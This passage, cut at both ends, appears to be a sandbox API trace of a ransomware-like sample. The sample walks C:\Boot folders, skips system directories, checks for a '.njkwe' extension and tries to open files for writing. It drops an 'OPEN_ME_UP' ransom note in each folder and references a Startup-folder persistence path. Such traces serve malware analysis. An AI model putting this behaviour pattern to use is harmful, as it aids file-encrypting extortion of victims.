nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0065.119] lstrcmpiW (lpString1="ko-KR", lpString2="Windows") returned -1 [0065.119] lstrcmpiW (lpString1="ko-KR", lpString2="$Recycle.bin") returned 1 [0065.119] lstrcmpiW (lpString1="ko-KR", lpString2="System Volume Information") returned -1 [0065.119] lstrcmpiW (lpString1="ko-KR", lpString2="Program Files") returned -1 [0065.119] lstrcmpiW (lpString1="ko-KR", lpString2="Program Files (x86)") returned -1 [0065.119] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR") returned 17 [0065.119] lstrcmpW (lpString1="ko-KR", lpString2=".") returned 1 [0065.119] lstrcmpW (lpString1="ko-KR", lpString2="..") returned 1 [0065.119] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\ko-KR", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.119] GetProcessHeap () returned 0xbe0000 [0065.119] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.119] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\*") returned 19 [0065.119] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1a0 [0065.120] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.120] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.120] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.120] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.120] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.120] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\.") returned 19 [0065.120] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.120] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.120] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.120] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.120] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.120] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.120] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.120] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\..") returned 20 [0065.120] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.120] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.120] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211c6af1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10560, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.120] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.120] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.120] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.120] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.120] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.120] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 33 [0065.120] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.120] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.121] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.121] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.121] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.121] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fdc0d7, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.121] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.121] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.121] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.121] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.121] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.121] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\memtest.exe.mui") returned 33 [0065.121] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.121] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.121] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.121] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\ko-KR\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.121] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.121] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fdc0d7, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.121] FindClose (in: hFindFile=0xc1a1a0 | out: hFindFile=0xc1a1a0) returned 1 [0065.121] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.121] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\ko-kr\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.123] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.123] CloseHandle (hObject=0x428) returned 1 [0065.124] GetProcessHeap () returned 0xbe0000 [0065.124] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.124] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0065.124] lstrcmpiW (lpString1="lt-LT", lpString2="Windows") returned -1 [0065.124] lstrcmpiW (lpString1="lt-LT", lpString2="$Recycle.bin") returned 1 [0065.124] lstrcmpiW (lpString1="lt-LT", lpString2="System Volume Information") returned -1 [0065.124] lstrcmpiW (lpString1="lt-LT", lpString2="Program Files") returned -1 [0065.124] lstrcmpiW (lpString1="lt-LT", lpString2="Program Files (x86)") returned -1 [0065.124] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\lt-LT") returned 17 [0065.124] lstrcmpW (lpString1="lt-LT", lpString2=".") returned 1 [0065.124] lstrcmpW (lpString1="lt-LT", lpString2="..") returned 1 [0065.124] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\lt-LT", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.124] GetProcessHeap () returned 0xbe0000 [0065.124] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.124] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\lt-LT\\*") returned 19 [0065.124] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\lt-LT\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1e0 [0065.124] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.124] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.124] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.124] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.124] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.124] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\lt-LT\\.") returned 19 [0065.124] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.124] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.124] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.124] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.125] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.125] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.125] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.125] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\lt-LT\\..") returned 20 [0065.125] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.125] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.125] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.125] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.125] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.125] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.125] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.125] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.125] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\lt-LT\\bootmgr.exe.mui") returned 33 [0065.125] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.125] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.125] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.125] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\lt-LT\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.125] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.126] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0065.126] FindClose (in: hFindFile=0xc1a1e0 | out: hFindFile=0xc1a1e0) returned 1 [0065.126] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\lt-LT\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.126] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\lt-LT\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\lt-lt\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.126] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.127] CloseHandle (hObject=0x428) returned 1 [0065.127] GetProcessHeap () returned 0xbe0000 [0065.127] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.127] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0065.127] lstrcmpiW (lpString1="lv-LV", lpString2="Windows") returned -1 [0065.127] lstrcmpiW (lpString1="lv-LV", lpString2="$Recycle.bin") returned 1 [0065.127] lstrcmpiW (lpString1="lv-LV", lpString2="System Volume Information") returned -1 [0065.127] lstrcmpiW (lpString1="lv-LV", lpString2="Program Files") returned -1 [0065.127] lstrcmpiW (lpString1="lv-LV", lpString2="Program Files (x86)") returned -1 [0065.127] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\lv-LV") returned 17 [0065.127] lstrcmpW (lpString1="lv-LV", lpString2=".") returned 1 [0065.127] lstrcmpW (lpString1="lv-LV", lpString2="..") returned 1 [0065.127] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\lv-LV", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.127] GetProcessHeap () returned 0xbe0000 [0065.127] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.128] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\lv-LV\\*") returned 19 [0065.128] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\lv-LV\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ca0 [0065.128] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.128] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.128] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.128] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.128] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.128] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\lv-LV\\.") returned 19 [0065.128] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.128] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.128] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.128] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.128] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.128] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.128] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.128] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\lv-LV\\..") returned 20 [0065.128] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.128] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.128] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.128] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.128] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.128] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.128] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.128] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.128] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\lv-LV\\bootmgr.exe.mui") returned 33 [0065.128] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.128] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.128] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.128] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\lv-LV\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.128] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.129] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0065.129] FindClose (in: hFindFile=0xc19ca0 | out: hFindFile=0xc19ca0) returned 1 [0065.129] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\lv-LV\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.129] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\lv-LV\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\lv-lv\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.129] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.130] CloseHandle (hObject=0x428) returned 1 [0065.130] GetProcessHeap () returned 0xbe0000 [0065.130] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.130] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6196d8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbcf473f, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xc63a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0065.130] lstrcmpiW (lpString1="memtest.exe", lpString2="Windows") returned -1 [0065.130] lstrcmpiW (lpString1="memtest.exe", lpString2="$Recycle.bin") returned 1 [0065.130] lstrcmpiW (lpString1="memtest.exe", lpString2="System Volume Information") returned -1 [0065.131] lstrcmpiW (lpString1="memtest.exe", lpString2="Program Files") returned -1 [0065.131] lstrcmpiW (lpString1="memtest.exe", lpString2="Program Files (x86)") returned -1 [0065.131] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\memtest.exe") returned 23 [0065.131] StrStrIW (lpFirst="memtest.exe", lpSrch=".njkwe") returned 0x0 [0065.131] lstrcmpW (lpString1="memtest.exe", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.131] lstrcmpW (lpString1="memtest.exe", lpString2="taridd") returned -1 [0065.131] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\memtest.exe", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.131] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.131] 